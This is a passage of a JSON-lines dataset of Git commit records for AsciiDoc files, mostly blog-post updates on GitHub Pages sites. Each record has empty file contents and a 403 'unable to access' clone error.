\u6bb5\u843d\u3092\u4fee\u6b63\n","repos":"liyunsheng\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,azu\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,genie88\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,azu\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,cqricky\/promises-book,dieface\/promises-book,genie88\/promises-book,cqricky\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,oToUC\/promises-book,azu\/promises-book,liubin\/promises-book,sunfurong\/promise,liubin\/promises-book,mzbac\/promises-book,sunfurong\/promise,mzbac\/promises-book,oToUC\/promises-book,wenber\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,wenber\/promises-book","old_file":"Ch4_AdvancedPromises\/resolve-thenable.adoc","new_file":"Ch4_AdvancedPromises\/resolve-thenable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3103c419ab30986a6decde7b27010f4d5c29d26d","subject":"Update 2016-07-22-prova.adoc","message":"Update 2016-07-22-prova.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-prova.adoc","new_file":"_posts\/2016-07-22-prova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"999656e6f8835fa10a7735d40f974ee35f5f4517","subject":"Python: variable is defined?","message":"Python: variable is defined?\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c6f92f3c4b238e0b41b06cbe79ece83c70ae8fea","subject":"Added readme","message":"Added readme\n","repos":"Frege\/frege-gradle-plugin,breskeby\/frege-gradle-plugin,breskeby\/frege-gradle-plugin,Frege\/frege-gradle-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/breskeby\/frege-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6afdb9417b070ef8239f562f4ce92010022494bf","subject":"Updated README to clarify minimum version requirements for cargo\/rustc","message":"Updated README to clarify minimum version requirements for cargo\/rustc\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned 
error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6499476503aabfc42cc4d994331fad4d6f12fcfb","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5cd4902d9b72187e01fe592c2a9709579999d62","subject":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","message":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2df34aadd77483f19a817806e0ff6822a12ccc9b","subject":"Update 2016-06-28-About.adoc","message":"Update 2016-06-28-About.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-About.adoc","new_file":"_posts\/2016-06-28-About.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0362e782af8895dce841cb816ef2fff19972ed03","subject":"Update 2019-01-31-Titre.adoc","message":"Update 2019-01-31-Titre.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Titre.adoc","new_file":"_posts\/2019-01-31-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1812d11f72b98161d755f484196e5c5781b4383e","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a63e5cf7d7701991729ff03da5f3bca61824439","subject":"Update 2016-03-22-Hello.adoc","message":"Update 
2016-03-22-Hello.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-22-Hello.adoc","new_file":"_posts\/2016-03-22-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"649d36abb61e49c5be178e7db48221a70514ce10","subject":"Update 2016-06-04-JSONP.adoc","message":"Update 2016-06-04-JSONP.adoc","repos":"YvonneZhang\/yvonnezhang.github.io","old_file":"_posts\/2016-06-04-JSONP.adoc","new_file":"_posts\/2016-06-04-JSONP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YvonneZhang\/yvonnezhang.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7ef94f9ee3d545bb740631b101d26dfe7e08fc0","subject":"Update 2017-02-01-About.adoc","message":"Update 2017-02-01-About.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-02-01-About.adoc","new_file":"_posts\/2017-02-01-About.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5dcf55d25bd82c8f014beaf7722d2ec17d743fd","subject":"fix #249 added ADR template (#251)","message":"fix #249 added ADR template (#251)\n\nthanx again Ralf...","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"src\/docs\/development\/template.adoc","new_file":"src\/docs\/development\/template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70eee7201921ab63bf2711ce0da4139afa03ea06","subject":"Update 2015-06-26-Asciinema-file-creator.adoc","message":"Update 2015-06-26-Asciinema-file-creator.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-06-26-Asciinema-file-creator.adoc","new_file":"_posts\/2015-06-26-Asciinema-file-creator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b21fef2f3a862ac3c05b09b5930c421db3d5d85","subject":"Update 2016-05-20-How-to-become-a-Master.adoc","message":"Update 2016-05-20-How-to-become-a-Master.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-20-How-to-become-a-Master.adoc","new_file":"_posts\/2016-05-20-How-to-become-a-Master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da508567017a7e684f7af068e1890c929bd698d1","subject":"Update 2017-07-19-Wednesday-July-19-2017.adoc","message":"Update 
2017-07-19-Wednesday-July-19-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-19-Wednesday-July-19-2017.adoc","new_file":"_posts\/2017-07-19-Wednesday-July-19-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d533986f58b455f100fc88b6c9a2748940046447","subject":"Added a README.adoc","message":"Added a README.adoc\n","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"src\/test\/java\/net\/openhft\/chronicle\/wire\/channel\/book\/README.adoc","new_file":"src\/test\/java\/net\/openhft\/chronicle\/wire\/channel\/book\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a259c996d5eef0f7e9c93d8da33adf0d6b15b1a2","subject":"Update 2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","message":"Update 2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","new_file":"_posts\/2017-04-16-Kathiyawadi-Baingan-bhartha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14762dd00a0522dff9014771b710e237a1011a7","subject":"Update 2018-06-09-Securing-Jenkins-Workspaces.adoc","message":"Update 2018-06-09-Securing-Jenkins-Workspaces.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2018-06-09-Securing-Jenkins-Workspaces.adoc","new_file":"_posts\/2018-06-09-Securing-Jenkins-Workspaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"580b2c09401fe38e1ec075bdb204138f91e3690c","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"1b68b2c49731563b9a1d33c08b8f97399e073808","subject":"v1.93","message":"v1.93\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7bc97d1a9e686a919f55d6d1491bb277d327805","subject":"Update 2019-01-31.adoc","message":"Update 2019-01-31.adoc","repos":"qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io,qu85101522\/qu85101522.github.io","old_file":"_posts\/2019-01-31.adoc","new_file":"_posts\/2019-01-31.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qu85101522\/qu85101522.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41dd691f6dc16b9809e792cf58fcce2dc8b5dec0","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d08398e9e3bcfb7b393fef9b8d63c78ef398c11","subject":"Update 2013-12-06-OSX-Notes.adoc","message":"Update 2013-12-06-OSX-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-12-06-OSX-Notes.adoc","new_file":"_posts\/2013-12-06-OSX-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2e951de18516f5fb340ef1e55ca574f75f3a574","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d43b88153655da926ade9d01ce2ed7c298c5470c","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"97a993fe5294bbe415ff7ac01e727e0fcc06f3b8","subject":"Update 2015-10-08-pic-2.adoc","message":"Update 2015-10-08-pic-2.adoc","repos":"duarte-fonseca\/duarte-fonseca.github.io,duarte-fonseca\/duarte-fonseca.github.io,duarte-fonseca\/duarte-fonseca.github.io","old_file":"_posts\/2015-10-08-pic-2.adoc","new_file":"_posts\/2015-10-08-pic-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duarte-fonseca\/duarte-fonseca.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc05f81c734d5e22b50cf4260622f958b2dd830","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fbeabb997088dc5e0a5becd9369e8f74ecbce53","subject":"Update 2017-08-11-Intro.adoc","message":"Update 2017-08-11-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-08-11-Intro.adoc","new_file":"_posts\/2017-08-11-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e71c00e0695b23cd1ee1957440d36301b561d5a1","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8e81518544e63559eefebd9558c04994971162f","subject":"First steps of guide of releasing under incubation","message":"First steps of guide of releasing under incubation\n","repos":"marc0der\/groovy-website,rahulsom\/sdkman-website,kevintanhongann\/groovy-website,sdkman\/sdkman-website,benignbala\/groovy-website,rahulsom\/sdkman-website,dmesu\/sdkman-website,marcoVermeulen\/groovy-website,groovy\/groovy-website,kevintanhongann\/groovy-website,webkaz\/groovy-website,marc0der\/groovy-website,webkaz\/groovy-website,benignbala\/groovy-website,dmesu\/sdkman-website,marcoVermeulen\/groovy-website,groovy\/groovy-website,sdkman\/sdkman-website","old_file":"site\/src\/site\/wiki\/incubation-release-process.adoc","new_file":"site\/src\/site\/wiki\/incubation-release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"457c3fe417acd7f553fc6a9f3bf983a65b6f276f","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c55ba4121dc8c190a7eb9f0aacab3315f394ddc2","subject":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","message":"Publish 2015-2-1-A-Man-Without-a-Country.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_file":"2015-2-1-A-Man-Without-a-Country.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8c63b64137115fa32df79d27a0793c0b49552f8","subject":"Update 2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","message":"Update 2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_file":"_posts\/2017-03-13-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca9019706cbccd2af4906741c4044c49e04f7ac4","subject":"Update 2016-01-14-importxml.adoc","message":"Update 2016-01-14-importxml.adoc","repos":"danen-carlson\/blog,danen-carlson\/blog,danen-carlson\/blog","old_file":"_posts\/2016-01-14-importxml.adoc","new_file":"_posts\/2016-01-14-importxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danen-carlson\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37349fe99a92c5aee14848d01405b0f26b462b47","subject":"Update 2016-09-03-Try-num-2.adoc","message":"Update 2016-09-03-Try-num-2.adoc","repos":"bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io","old_file":"_posts\/2016-09-03-Try-num-2.adoc","new_file":"_posts\/2016-09-03-Try-num-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbsome\/bbsome.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f8a24e1a5dfa3fae5e4848b9d196b22b5c20cd","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 
2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e6c73353fcb89fa92fe9b96b328d091a89bd247","subject":"Renamed '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Renamed '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc' to '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31b48e291497f0242dca1ffda3ba42a6cdfe544b","subject":"Update 2015-08-17-Mono.adoc","message":"Update 2015-08-17-Mono.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-17-Mono.adoc","new_file":"_posts\/2015-08-17-Mono.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e645c2787368ee3e77adf7264498dedf9a318fe5","subject":"Remove note about truename and pathname","message":"Remove note about truename and pathname\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3cd19feabc7e50525e38edd4c0d349bc42b55407","subject":"CL: better code format","message":"CL: better code format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2aed9cbfa18c1408c66a3b995ab6faa754f35a07","subject":"Update 2018-07-24-deadline.adoc","message":"Update 2018-07-24-deadline.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-24-deadline.adoc","new_file":"_posts\/2018-07-24-deadline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"672ffb22680fc6d8436ded42bb9aea1612e284c1","subject":"y2b create post iPhone 6 Bend Test + HTC One M8, Moto X, Others","message":"y2b create post iPhone 6 Bend Test + HTC One M8, Moto X, Others","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-24-iPhone-6-Bend-Test--HTC-One-M8-Moto-X-Others.adoc","new_file":"_posts\/2014-09-24-iPhone-6-Bend-Test--HTC-One-M8-Moto-X-Others.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33ad055ed938efdbc06b9f9d720d82fc213bd2d2","subject":"Publish Nov-11-2015-Hoka-One-One.adoc","message":"Publish Nov-11-2015-Hoka-One-One.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"Nov-11-2015-Hoka-One-One.adoc","new_file":"Nov-11-2015-Hoka-One-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5572584baef7d5c2144043d58f0460432fd1d134","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 